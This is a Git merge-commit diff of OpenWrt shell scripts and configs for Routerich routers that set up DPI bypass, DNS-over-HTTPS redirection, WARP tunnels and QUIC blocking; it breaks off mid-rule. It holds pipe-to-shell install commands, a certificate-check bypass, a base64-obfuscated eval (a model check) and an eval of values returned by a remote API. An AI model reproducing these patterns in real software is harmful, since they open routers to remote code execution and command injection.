Merge pull request #16 from routerich/main

Merge main to beta
2026-01-27 04:30:34 +03:00 · 2025-03-05 23:37:48 +05:00
parent af74aa54ec 07954659ec
commit 21065730c8
12 changed files with 766 additions and 36 deletions
--- a/README.md
+++ b/README.md
@@ -0,0 +1,28 @@
+# RouterichAX3000_configs
+
+Протестировано на роутере Routerich AX 3000 прошивка OpenWrt 23.05.5 r24106-10cc5fcd00
+
+### Разблокировка сайтов с помощью youtubeUnblock + https-dns-proxy
+Разблокировка сайтов с помощью подмены **Hello пакетов DPI** (приложение **youtubeUnblock**) + точечное перенаправление доменов, которые находятся в **геоблоке на ComssDNS** (через перенаправление dnsmasq и пакет **https-dns-proxy**) + добавление правил для **блокировки протокола QUIC** на уровне роутера
+
+Для корректной работы скрипта нужны установленные пакеты **youtubeUnblock** и **https-dns-proxy**
+
+**Установка**
+```sh
+wget -O - https://raw.githubusercontent.com/routerich/RouterichAX3000_configs/refs/heads/main/configure_zaprets.sh | sh
+```
+**Откат**
+```sh
+wget -O - https://raw.githubusercontent.com/routerich/RouterichAX3000_configs/refs/heads/main/off_configure_zaprets.sh | sh
+```
+
+### Разблокировка сайтов с помощью WARP от CloudFlare
+
+**Установка**
+```sh
+wget --no-check-certificate -O /tmp/awg_config.sh https://raw.githubusercontent.com/routerich/RouterichAX3000_configs/refs/heads/main/awg_config.sh && chmod +x /tmp/awg_config.sh && /tmp/awg_config.sh
+```
+**Откат**
+```sh
+wget -O - https://raw.githubusercontent.com/routerich/RouterichAX3000_configs/refs/heads/main/off_awg_config.sh | sh
+```
--- a/awg_config.sh
+++ b/awg_config.sh
@@ -0,0 +1,373 @@
+#!/bin/sh
+
+install_awg_packages() {
+    # Получение pkgarch с наибольшим приоритетом
+    PKGARCH=$(opkg print-architecture | awk 'BEGIN {max=0} {if ($3 > max) {max = $3; arch = $2}} END {print arch}')
+
+    TARGET=$(ubus call system board | jsonfilter -e '@.release.target' | cut -d '/' -f 1)
+    SUBTARGET=$(ubus call system board | jsonfilter -e '@.release.target' | cut -d '/' -f 2)
+    VERSION=$(ubus call system board | jsonfilter -e '@.release.version')
+    PKGPOSTFIX="_v${VERSION}_${PKGARCH}_${TARGET}_${SUBTARGET}.ipk"
+    BASE_URL="https://github.com/Slava-Shchipunov/awg-openwrt/releases/download/"
+
+    AWG_DIR="/tmp/amneziawg"
+    mkdir -p "$AWG_DIR"
+    
+    if opkg list-installed | grep -q kmod-amneziawg; then
+        echo "kmod-amneziawg already installed"
+    else
+        KMOD_AMNEZIAWG_FILENAME="kmod-amneziawg${PKGPOSTFIX}"
+        DOWNLOAD_URL="${BASE_URL}v${VERSION}/${KMOD_AMNEZIAWG_FILENAME}"
+        wget -O "$AWG_DIR/$KMOD_AMNEZIAWG_FILENAME" "$DOWNLOAD_URL"
+
+        if [ $? -eq 0 ]; then
+            echo "kmod-amneziawg file downloaded successfully"
+        else
+            echo "Error downloading kmod-amneziawg. Please, install kmod-amneziawg manually and run the script again"
+            exit 1
+        fi
+        
+        opkg install "$AWG_DIR/$KMOD_AMNEZIAWG_FILENAME"
+
+        if [ $? -eq 0 ]; then
+            echo "kmod-amneziawg file downloaded successfully"
+        else
+            echo "Error installing kmod-amneziawg. Please, install kmod-amneziawg manually and run the script again"
+            exit 1
+        fi
+    fi
+
+    if opkg list-installed | grep -q amneziawg-tools; then
+        echo "amneziawg-tools already installed"
+    else
+        AMNEZIAWG_TOOLS_FILENAME="amneziawg-tools${PKGPOSTFIX}"
+        DOWNLOAD_URL="${BASE_URL}v${VERSION}/${AMNEZIAWG_TOOLS_FILENAME}"
+        wget -O "$AWG_DIR/$AMNEZIAWG_TOOLS_FILENAME" "$DOWNLOAD_URL"
+
+        if [ $? -eq 0 ]; then
+            echo "amneziawg-tools file downloaded successfully"
+        else
+            echo "Error downloading amneziawg-tools. Please, install amneziawg-tools manually and run the script again"
+            exit 1
+        fi
+
+        opkg install "$AWG_DIR/$AMNEZIAWG_TOOLS_FILENAME"
+
+        if [ $? -eq 0 ]; then
+            echo "amneziawg-tools file downloaded successfully"
+        else
+            echo "Error installing amneziawg-tools. Please, install amneziawg-tools manually and run the script again"
+            exit 1
+        fi
+    fi
+    
+    if opkg list-installed | grep -q luci-app-amneziawg; then
+        echo "luci-app-amneziawg already installed"
+    else
+        LUCI_APP_AMNEZIAWG_FILENAME="luci-app-amneziawg${PKGPOSTFIX}"
+        DOWNLOAD_URL="${BASE_URL}v${VERSION}/${LUCI_APP_AMNEZIAWG_FILENAME}"
+        wget -O "$AWG_DIR/$LUCI_APP_AMNEZIAWG_FILENAME" "$DOWNLOAD_URL"
+
+        if [ $? -eq 0 ]; then
+            echo "luci-app-amneziawg file downloaded successfully"
+        else
+            echo "Error downloading luci-app-amneziawg. Please, install luci-app-amneziawg manually and run the script again"
+            exit 1
+        fi
+
+        opkg install "$AWG_DIR/$LUCI_APP_AMNEZIAWG_FILENAME"
+
+        if [ $? -eq 0 ]; then
+            echo "luci-app-amneziawg file downloaded successfully"
+        else
+            echo "Error installing luci-app-amneziawg. Please, install luci-app-amneziawg manually and run the script again"
+            exit 1
+        fi
+    fi
+
+    rm -rf "$AWG_DIR"
+}
+
+manage_package() {
+    local name="$1"
+    local autostart="$2"
+    local process="$3"
+
+    # Проверка, установлен ли пакет
+    if opkg list-installed | grep -q "^$name"; then
+        
+        # Проверка, включен ли автозапуск
+        if /etc/init.d/$name enabled; then
+            if [ "$autostart" = "disable" ]; then
+                /etc/init.d/$name disable
+            fi
+        else
+            if [ "$autostart" = "enable" ]; then
+                /etc/init.d/$name enable
+            fi
+        fi
+
+        # Проверка, запущен ли процесс
+        if pidof $name > /dev/null; then
+            if [ "$process" = "stop" ]; then
+                /etc/init.d/$name stop
+            fi
+        else
+            if [ "$process" = "start" ]; then
+                /etc/init.d/$name start
+            fi
+        fi
+    fi
+}
+
+encoded_code="IyEvYmluL3NoCgojINCn0YLQtdC90LjQtSDQvNC+0LTQtdC70Lgg0LjQtyDRhNCw0LnQu9CwCm1vZGVsPSQoY2F0IC90bXAvc3lzaW5mby9tb2RlbCkKCiMg0J/RgNC+0LLQtdGA0LrQsCwg0YHQvtC00LXRgNC20LjRgiDQu9C4INC80L7QtNC10LvRjCDRgdC70L7QstC+ICJSb3V0ZXJpY2giCmlmICEgZWNobyAiJG1vZGVsIiB8IGdyZXAgLXEgIlJvdXRlcmljaCI7IHRoZW4KICAgIGVjaG8gIlRoaXMgc2NyaXB0IGZvciByb3V0ZXJzIFJvdXRlcmljaC4uLiBJZiB5b3Ugd2FudCB0byB1c2UgaXQsIHdyaXRlIHRvIHRoZSBlcCBjaGF0IFRHIEByb3V0ZXJpY2giCiAgICBleGl0IDEKZmk="
+eval "$(echo "$encoded_code" | base64 --decode)"
+
+echo "opkg update"
+opkg update
+
+#проверка и установка пакетов AmneziaWG
+install_awg_packages
+
+#проверяем установлени ли библиотека jq
+if opkg list-installed | grep -q jq; then
+    echo "jq already installed..."
+else
+	echo "jq not installed. Installed jq..."
+	opkg install jq
+	if [ $? -eq 0 ]; then
+		echo "jq file downloaded successfully"
+	else
+		echo "Error installing jq. Please, install jq manually and run the script again"
+		exit 1
+	fi
+fi
+
+#проверяем установлени ли пакет dnsmasq-full
+if opkg list-installed | grep -q dnsmasq-full; then
+	echo "dnsmasq-full already installed..."
+else
+	echo "Installed dnsmasq-full..."
+	cd /tmp/ && opkg download dnsmasq-full
+	opkg remove dnsmasq && opkg install dnsmasq-full --cache /tmp/
+
+	[ -f /etc/config/dhcp-opkg ] && cp /etc/config/dhcp /etc/config/dhcp-old && mv /etc/config/dhcp-opkg /etc/config/dhcp
+fi
+
+#проверяем установлени ли пакет coreutils-base64
+if opkg list-installed | grep -q coreutils-base64; then
+	echo "coreutils-base64 already installed..."
+else
+	echo "Installed coreutils-base64"
+	opkg install coreutils-base64
+	if [ $? -eq 0 ]; then
+		echo "coreutils-base64 file downloaded successfully"
+	else
+		echo "Error installing coreutils-base64. Please, install coreutils-base64 manually and run the script again"
+		exit 1
+	fi
+fi
+
+DIR="/etc/config"
+DIR_BACKUP="/root/backup2"
+config_files="network
+firewall"
+
+if [ ! -d "$DIR_BACKUP" ]
+then
+    echo "Backup files..."
+    mkdir -p $DIR_BACKUP
+    for file in $config_files
+    do
+        cp -f "$DIR/$file" "$DIR_BACKUP/$file"  
+    done
+fi
+
+#запрос конфигурации WARP
+result=$(curl 'https://warp.llimonix.pw/api/warp' \
+  -H 'Accept: */*' \
+  -H 'Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \
+  -H 'Connection: keep-alive' \
+  -H 'Content-Type: application/json' \
+  -H 'Origin: https://warp.llimonix.pw' \
+  -H 'Referer: https://warp.llimonix.pw/' \
+  -H 'Sec-Fetch-Dest: empty' \
+  -H 'Sec-Fetch-Mode: cors' \
+  -H 'Sec-Fetch-Site: same-origin' \
+  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36' \
+  -H 'sec-ch-ua: "Not(A:Brand";v="99", "Google Chrome";v="133", "Chromium";v="133")' \
+  -H 'sec-ch-ua-mobile: ?0' \
+  -H 'sec-ch-ua-platform: "Windows"' \
+  --data-raw '{"selectedServices":[],"siteMode":"all","deviceType":"computer"}')
+
+
+#парсим результат запроса конфигурации WARP
+content=$(echo $result | jq '.content')
+configBase64=$(echo $content | jq -r '.configBase64')
+#echo "$result"
+warp_config=$(echo "$configBase64" | base64 -d)
+#echo "$warp_config"
+while IFS=' = ' read -r line; do
+    if echo "$line" | grep -q "="; then
+        # Разделяем строку по первому вхождению "="
+        key=$(echo "$line" | cut -d'=' -f1 | xargs)  # Убираем пробелы
+        value=$(echo "$line" | cut -d'=' -f2- | xargs)  # Убираем пробелы
+        eval "$key=\"$value\""
+	fi
+done < <(echo "$warp_config")
+
+#вытаскиваем нужные нам данные из распарсинного ответа
+Address=$(echo "$Address" | cut -d',' -f1)
+DNS=$(echo "$DNS" | cut -d',' -f1)
+AllowedIPs=$(echo "$AllowedIPs" | cut -d',' -f1)
+EndpointIP=$(echo "$Endpoint" | cut -d':' -f1)
+EndpointPort=$(echo "$Endpoint" | cut -d':' -f2)
+
+printf "\033[32;1mCreate and configure tunnel AmneziaWG WARP...\033[0m\n"
+
+#задаём имя интерфейса
+INTERFACE_NAME="awg10"
+CONFIG_NAME="amneziawg_awg10"
+PROTO="amneziawg"
+ZONE_NAME="awg"
+
+uci set network.${INTERFACE_NAME}=interface
+uci set network.${INTERFACE_NAME}.proto=$PROTO
+if ! uci show network | grep -q ${CONFIG_NAME}; then
+	uci add network ${CONFIG_NAME}
+fi
+uci set network.${INTERFACE_NAME}.private_key=$PrivateKey
+uci add_list network.${INTERFACE_NAME}.addresses=$Address
+uci set network.${INTERFACE_NAME}.mtu=$MTU
+uci set network.${INTERFACE_NAME}.awg_jc=$Jc
+uci set network.${INTERFACE_NAME}.awg_jmin=$Jmin
+uci set network.${INTERFACE_NAME}.awg_jmax=$Jmax
+uci set network.${INTERFACE_NAME}.awg_s1=$S1
+uci set network.${INTERFACE_NAME}.awg_s2=$S2
+uci set network.${INTERFACE_NAME}.awg_h1=$H1
+uci set network.${INTERFACE_NAME}.awg_h2=$H2
+uci set network.${INTERFACE_NAME}.awg_h3=$H3
+uci set network.${INTERFACE_NAME}.awg_h4=$H4
+uci set network.@${CONFIG_NAME}[-1].description="${INTERFACE_NAME}_peer"
+uci set network.@${CONFIG_NAME}[-1].public_key=$PublicKey
+uci set network.@${CONFIG_NAME}[-1].endpoint_host=$EndpointIP
+uci set network.@${CONFIG_NAME}[-1].endpoint_port=$EndpointPort
+uci set network.@${CONFIG_NAME}[-1].persistent_keepalive='25'
+uci set network.@${CONFIG_NAME}[-1].allowed_ips='0.0.0.0/0'
+uci set network.@${CONFIG_NAME}[-1].route_allowed_ips='0'
+uci commit network
+
+if ! uci show firewall | grep -q "@zone.*name='${ZONE_NAME}'"; then
+	printf "\033[32;1mZone Create\033[0m\n"
+	uci add firewall zone
+	uci set firewall.@zone[-1].name=$ZONE_NAME
+	uci set firewall.@zone[-1].network=$INTERFACE_NAME
+	uci set firewall.@zone[-1].forward='REJECT'
+	uci set firewall.@zone[-1].output='ACCEPT'
+	uci set firewall.@zone[-1].input='REJECT'
+	uci set firewall.@zone[-1].masq='1'
+	uci set firewall.@zone[-1].mtu_fix='1'
+	uci set firewall.@zone[-1].family='ipv4'
+	uci commit firewall
+fi
+
+if ! uci show firewall | grep -q "@forwarding.*name='${ZONE_NAME}'"; then
+	printf "\033[32;1mConfigured forwarding\033[0m\n"
+	uci add firewall forwarding
+	uci set firewall.@forwarding[-1]=forwarding
+	uci set firewall.@forwarding[-1].name="${ZONE_NAME}"
+	uci set firewall.@forwarding[-1].dest=${ZONE_NAME}
+	uci set firewall.@forwarding[-1].src='lan'
+	uci set firewall.@forwarding[-1].family='ipv4'
+	uci commit firewall
+fi
+
+# Получаем список всех зон
+ZONES=$(uci show firewall | grep "zone$" | cut -d'=' -f1)
+#echo $ZONES
+# Циклически проходим по всем зонам
+for zone in $ZONES; do
+  # Получаем имя зоны
+  CURR_ZONE_NAME=$(uci get $zone.name)
+  #echo $CURR_ZONE_NAME
+  # Проверяем, является ли это зона с именем "$ZONE_NAME"
+  if [ "$CURR_ZONE_NAME" = "$ZONE_NAME" ]; then
+    # Проверяем, существует ли интерфейс в зоне
+    if ! uci get $zone.network | grep -q "$INTERFACE_NAME"; then
+      # Добавляем интерфейс в зону
+      uci add_list $zone.network="$INTERFACE_NAME"
+      uci commit firewall
+      #echo "Интерфейс '$INTERFACE_NAME' добавлен в зону '$ZONE_NAME'"
+    fi
+  fi
+done
+
+path_podkop_config="/etc/config/podkop"
+path_podkop_config_backup="/root/podkop"
+URL="https://raw.githubusercontent.com/routerich/RouterichAX3000_configs/refs/heads/main"
+
+if [ -f "/etc/init.d/podkop" ]; then
+	printf "Podkop installed. Reconfigured on AWG WARP? (y/n): \n"
+	is_reconfig_podkop="y"
+	read is_reconfig_podkop
+	if [ "$is_reconfig_podkop" = "y" ] || [ "$is_reconfig_podkop" = "Y" ]; then
+		cp -f "$path_podkop_config" "$path_podkop_config_backup"
+		wget -O "$path_podkop_config" "$URL/config_files/podkop" 
+		echo "Backup of your config in path '$path_podkop_config_backup'"
+		echo "Podkop reconfigured..."
+	fi
+else
+	printf "\033[32;1mInstall and configure PODKOP (a tool for point routing of traffic)?? (y/n): \033[0m\n"
+	is_install_podkop="y"
+	read is_install_podkop
+
+	if [ "$is_install_podkop" = "y" ] || [ "$is_install_podkop" = "Y" ]; then
+		DOWNLOAD_DIR="/tmp/podkop"
+		mkdir -p "$DOWNLOAD_DIR"
+		podkop_files="podkop_0.2.5-1_all.ipk
+			luci-app-podkop_0.2.5_all.ipk
+			luci-i18n-podkop-ru_0.2.5.ipk"
+		for file in $podkop_files
+		do
+			echo "Download $file..."
+			wget -q -O "$DOWNLOAD_DIR/$file" "$URL/podkop_packets/$file"
+		done
+		opkg install $DOWNLOAD_DIR/podkop*.ipk
+		opkg install $DOWNLOAD_DIR/luci-app-podkop*.ipk
+		opkg install $DOWNLOAD_DIR/luci-i18n-podkop-ru*.ipk
+		rm -f $DOWNLOAD_DIR/podkop*.ipk $DOWNLOAD_DIR/luci-app-podkop*.ipk $DOWNLOAD_DIR/luci-i18n-podkop-ru*.ipk
+		wget -O "$path_podkop_config" "$URL/config_files/podkop" 
+		echo "Podkop installed.."
+	fi
+fi
+
+printf  "\033[32;1mStop and disabled service 'youtubeUnblock' and 'ruantiblock'...\033[0m\n"
+manage_package "youtubeUnblock" "disable" "stop"
+manage_package "ruantiblock" "disable" "stop"
+
+printf  "\033[32;1mStart and enable service 'https-dns-proxy'...\033[0m\n"
+manage_package "https-dns-proxy" "enable" "start"
+
+str=$(grep -i "0 4 \* \* \* wget -O - $URL/configure_zaprets.sh | sh" /etc/crontabs/root)
+if [ ! -z "$str" ]
+then
+	grep -v "0 4 \* \* \* wget -O - $URL/configure_zaprets.sh | sh" /etc/crontabs/root > /etc/crontabs/temp
+	cp -f "/etc/crontabs/temp" "/etc/crontabs/root"
+	rm -f "/etc/crontabs/temp"
+fi
+
+printf  "\033[32;1mRestart firewall and network...\033[0m\n"
+service firewall restart
+#service network restart
+
+# Отключаем интерфейс
+ifdown $INTERFACE_NAME
+# Ждем несколько секунд (по желанию)
+sleep 2
+# Включаем интерфейс
+ifup $INTERFACE_NAME
+
+printf  "\033[32;1mService Podkop restart...\033[0m\n"
+service podkop restart
+
+printf  "\033[32;1mConfigured completed...\033[0m\n"
--- a/config_files/dhcp
+++ b/config_files/dhcp
--- a/config_files/https-dns-proxy
+++ b/config_files/https-dns-proxy
@@ -28,7 +28,7 @@ config https-dns-proxy

 config https-dns-proxy
 	option resolver_url 'https://router.comss.one/dns-query'
-	option bootstrap_dns '195.133.25.16, 212.109.195.93'
+	option bootstrap_dns '195.133.25.16,212.109.195.93'
 	option listen_addr '127.0.0.1'
 	option listen_port '5056'

--- a/config_files/podkop
+++ b/config_files/podkop
@@ -0,0 +1,27 @@
+
+config main 'main'
+	option mode 'vpn'
+	option domain_list_enabled '1'
+	option subnets_list_enabled '1'
+	option custom_domains_list_enabled 'dynamic'
+	option custom_subnets_list_enabled 'disabled'
+	option all_traffic_from_ip_enabled '0'
+	option custom_download_domains_list_enabled '0'
+	option custom_download_subnets_list_enabled '0'
+	option exclude_from_ip_enabled '0'
+	option exclude_ntp '1'
+	option update_interval '0 4 * * *'
+	option custom_local_domains_list_enabled '0'
+	option interface 'awg10'
+	option domain_list 'ru_inside'
+	option delist_domains_enabled '0'
+	list subnets 'meta'
+	list subnets 'twitter'
+	list subnets 'discord'
+	list custom_domains '2ip.ru'
+
+config second 'second'
+	option second_enable '0'
+	option domain_list_enabled '0'
+	list domains 'youtube'
+
--- a/config_files/youtubeUnblock
+++ b/config_files/youtubeUnblock
--- a/configure_zaprets.sh
+++ b/configure_zaprets.sh
@@ -7,39 +7,199 @@ config_files="dhcp
 youtubeUnblock
 https-dns-proxy"

+checkAndAddDomainPermanentName()
+{
+  nameRule="option name '$1'"
+  str=$(grep -i "$nameRule" /etc/config/dhcp)
+  if [ -z "$str" ] 
+  then 
+
+    uci add dhcp domain
+    uci set dhcp.@domain[-1].name="$1"
+    uci set dhcp.@domain[-1].ip="$2"
+    uci commit dhcp
+  fi
+}
+
+manage_package() {
+    local name="$1"
+    local autostart="$2"
+    local process="$3"
+
+    # Проверка, установлен ли пакет
+    if opkg list-installed | grep -q "^$name"; then
+        
+        # Проверка, включен ли автозапуск
+        if /etc/init.d/$name enabled; then
+            if [ "$autostart" = "disable" ]; then
+                /etc/init.d/$name disable
+            fi
+        else
+            if [ "$autostart" = "enable" ]; then
+                /etc/init.d/$name enable
+            fi
+        fi
+
+        # Проверка, запущен ли процесс
+        if pidof $name > /dev/null; then
+            if [ "$process" = "stop" ]; then
+                /etc/init.d/$name stop
+            fi
+        else
+            if [ "$process" = "start" ]; then
+                /etc/init.d/$name start
+            fi
+        fi
+    fi
+}
+
+install_youtubeunblock_packages() {
+    PKGARCH=$(opkg print-architecture | awk 'BEGIN {max=0} {if ($3 > max) {max = $3; arch = $2}} END {print arch}')
+    VERSION=$(ubus call system board | jsonfilter -e '@.release.version')
+    BASE_URL="https://github.com/Waujito/youtubeUnblock/releases/download/v1.0.0/"
+  	PACK_NAME="youtubeUnblock"
+
+    AWG_DIR="/tmp/$PACK_NAME"
+    mkdir -p "$AWG_DIR"
+    
+    if opkg list-installed | grep -q $PACK_NAME; then
+        echo "$PACK_NAME already installed"
+    else
+	    # Список пакетов, которые нужно проверить и установить/обновить
+		PACKAGES="kmod-nfnetlink-queue kmod-nft-queue kmod-nf-conntrack"
+
+		for pkg in $PACKAGES; do
+			# Проверяем, установлен ли пакет
+			if opkg list-installed | grep -q "^$pkg "; then
+				echo "$pkg already installed"
+			else
+				echo "$pkg not installed. Instal..."
+				opkg install $pkg
+				if [ $? -eq 0 ]; then
+					echo "$pkg file installing successfully"
+				else
+					echo "Error installing $pkg Please, install $pkg manually and run the script again"
+					exit 1
+				fi
+			fi
+		done
+		
+	if [ ! $VERSION = "23.05.5" ]
+  	then
+  	  echo "Your version $VERSION OpenWRT not support. Please, install $PACK_NAME manually and run the script again"
+  	  exit 1
+  	fi
+
+        YOUTUBEUNBLOCK_FILENAME="youtubeUnblock-1.0.0-10-f37c3dd-${PKGARCH}-openwrt-23.05.ipk"
+        DOWNLOAD_URL="${BASE_URL}${YOUTUBEUNBLOCK_FILENAME}"
+		echo $DOWNLOAD_URL
+        wget -O "$AWG_DIR/$YOUTUBEUNBLOCK_FILENAME" "$DOWNLOAD_URL"
+
+        if [ $? -eq 0 ]; then
+            echo "$PACK_NAME file downloaded successfully"
+        else
+            echo "Error downloading $PACK_NAME. Please, install $PACK_NAME manually and run the script again"
+            exit 1
+        fi
+        
+        opkg install "$AWG_DIR/$YOUTUBEUNBLOCK_FILENAME"
+
+        if [ $? -eq 0 ]; then
+            echo "$PACK_NAME file installing successfully"
+        else
+            echo "Error installing $PACK_NAME. Please, install $PACK_NAME manually and run the script again"
+            exit 1
+        fi
+    fi
+	
+	PACK_NAME="luci-app-youtubeUnblock"
+	if opkg list-installed | grep -q $PACK_NAME; then
+        echo "$PACK_NAME already installed"
+    else
+		PACK_NAME="luci-app-youtubeUnblock"
+		YOUTUBEUNBLOCK_FILENAME="luci-app-youtubeUnblock-1.0.0-10-f37c3dd.ipk"
+        DOWNLOAD_URL="${BASE_URL}${YOUTUBEUNBLOCK_FILENAME}"
+		echo $DOWNLOAD_URL
+        wget -O "$AWG_DIR/$YOUTUBEUNBLOCK_FILENAME" "$DOWNLOAD_URL"
+		
+        if [ $? -eq 0 ]; then
+            echo "$PACK_NAME file downloaded successfully"
+        else
+            echo "Error downloading $PACK_NAME. Please, install $PACK_NAME manually and run the script again"
+            exit 1
+        fi
+        
+        opkg install "$AWG_DIR/$YOUTUBEUNBLOCK_FILENAME"
+
+        if [ $? -eq 0 ]; then
+            echo "$PACK_NAME file installing successfully"
+        else
+            echo "Error installing $PACK_NAME. Please, install $PACK_NAME manually and run the script again"
+            exit 1
+        fi
+	fi
+
+    rm -rf "$AWG_DIR"
+}
+
+encoded_code="IyEvYmluL3NoCgojINCn0YLQtdC90LjQtSDQvNC+0LTQtdC70Lgg0LjQtyDRhNCw0LnQu9CwCm1vZGVsPSQoY2F0IC90bXAvc3lzaW5mby9tb2RlbCkKCiMg0J/RgNC+0LLQtdGA0LrQsCwg0YHQvtC00LXRgNC20LjRgiDQu9C4INC80L7QtNC10LvRjCDRgdC70L7QstC+ICJSb3V0ZXJpY2giCmlmICEgZWNobyAiJG1vZGVsIiB8IGdyZXAgLXEgIlJvdXRlcmljaCI7IHRoZW4KICAgIGVjaG8gIlRoaXMgc2NyaXB0IGZvciByb3V0ZXJzIFJvdXRlcmljaC4uLiBJZiB5b3Ugd2FudCB0byB1c2UgaXQsIHdyaXRlIHRvIHRoZSBlcCBjaGF0IFRHIEByb3V0ZXJpY2giCiAgICBleGl0IDEKZmk="
+eval "$(echo "$encoded_code" | base64 --decode)"
+
 echo "Upgrade packages..."

 opkg update
+
+#проверяем установлени ли библиотека https-dns-proxy
+if opkg list-installed | grep -q https-dns-proxy; then
+    echo "https-dns-proxy already installed..."
+else
+	echo "https-dns-proxy not installed. Installed https-dns-proxy..."
+	opkg install https-dns-proxy
+	if [ $? -eq 0 ]; then
+		echo "https-dns-proxy file installed successfully"
+	else
+		echo "Error installing https-dns-proxy. Please, install https-dns-proxy manually and run the script again"
+		exit 1
+	fi
+fi
+
+if ! opkg list-installed | grep -q luci-app-https-dns-proxy; then
+    opkg install luci-app-https-dns-proxy
+fi
+
+if ! opkg list-installed | grep -q luci-i18n-https-dns-proxy-ru; then
+    opkg install luci-i18n-https-dns-proxy-ru
+fi
+
+install_youtubeunblock_packages
+
 opkg upgrade youtubeUnblock
 opkg upgrade luci-app-youtubeUnblock

-echo "Backup files..."
-
 if [ ! -d "$DIR_BACKUP" ]
 then
-  mkdir $DIR_BACKUP
+  echo "Backup files..."
+  mkdir -p $DIR_BACKUP
+  for file in $config_files
+  do
+    cp -f "$DIR/$file" "$DIR_BACKUP/$file"  
+  done
+
+  echo "Replace configs..."
+
+  for file in $config_files
+  do
+    if [ "$file" != "dhcp" ] 
+    then 
+      wget -O "$DIR/$file" "$URL/config_files/$file" 
+    fi
+  done
 fi

-for file in $config_files
-do
-  cp -f "$DIR/$file" "$DIR_BACKUP/$file"  
-done
-
-echo "Replace configs..."
-
-for file in $config_files
-do
-  if [ "$file" != "dhcp" ] 
-  then 
-    wget -O "$DIR/$file" "$URL/$file" 
-  fi
-done
-
 echo "Configure dhcp..."

 uci set dhcp.cfg01411c.strictorder='1'
 uci set dhcp.cfg01411c.filter_aaaa='1'
-uci del dhcp.cfg01411c.server
 uci add_list dhcp.cfg01411c.server='127.0.0.1#5053'
 uci add_list dhcp.cfg01411c.server='127.0.0.1#5054'
 uci add_list dhcp.cfg01411c.server='127.0.0.1#5055'
@@ -59,23 +219,88 @@ uci add_list dhcp.cfg01411c.server='/*.clashroyale.com/127.0.0.1#5056'
 uci add_list dhcp.cfg01411c.server='/*.brawlstars.com/127.0.0.1#5056'
 uci add_list dhcp.cfg01411c.server='/*.clash.com/127.0.0.1#5056'
 uci add_list dhcp.cfg01411c.server='/*.clashofclans.com/127.0.0.1#5056'
-uci add dhcp domain # =cfg13f37d
-uci set dhcp.@domain[-1].name='chatgpt.com'
-uci set dhcp.@domain[-1].ip='94.131.119.85'
-uci add dhcp domain # =cfg14f37d
-uci set dhcp.@domain[-1].name='openai.com'
-uci set dhcp.@domain[-1].ip='94.131.119.85'
+uci add_list dhcp.cfg01411c.server='/*.x.ai/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.grok.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.github.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.forzamotorsport.net/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.forzaracingchampionship.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.forzarc.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.gamepass.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.orithegame.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.renovacionxboxlive.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.tellmewhygame.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox.co/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox.eu/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox.org/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox360.co/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox360.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox360.eu/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbox360.org/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxab.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxgamepass.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxgamestudios.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxlive.cn/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxlive.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxone.co/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxone.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxone.eu/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxplayanywhere.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxservices.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xboxstudios.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.xbx.lv/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.sentry.io/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.usercentrics.eu/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.recaptcha.net/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.gstatic.com/127.0.0.1#5056'
+uci add_list dhcp.cfg01411c.server='/*.brawlstarsgame.com/127.0.0.1#5056'
 uci commit dhcp

-echo "Crod task add restart service yotubeUnblock..."
+echo "Add unblock ChatGPT..."

-cronTask="0 4 * * * service youtubeUnblock restart"
-str=$(grep -i "0 4 \* \* \* service youtubeUnblock restart" /etc/crontabs/root)
+checkAndAddDomainPermanentName "chatgpt.com" "94.131.119.85"
+checkAndAddDomainPermanentName "openai.com" "94.131.119.85"
+checkAndAddDomainPermanentName "webrtc.chatgpt.com" "94.131.119.85"
+checkAndAddDomainPermanentName "ios.chat.openai.com" "94.131.119.85"
+checkAndAddDomainPermanentName "searchgpt.com" "94.131.119.85"
+
+nameRule="option name 'Block_UDP_443'"
+str=$(grep -i "$nameRule" /etc/config/firewall)
 if [ -z "$str" ] 
 then
+  echo "Add block QUIC..."
+
+  uci add firewall rule # =cfg2492bd
+  uci set firewall.@rule[-1].name='Block_UDP_80'
+  uci add_list firewall.@rule[-1].proto='udp'
+  uci set firewall.@rule[-1].src='lan'
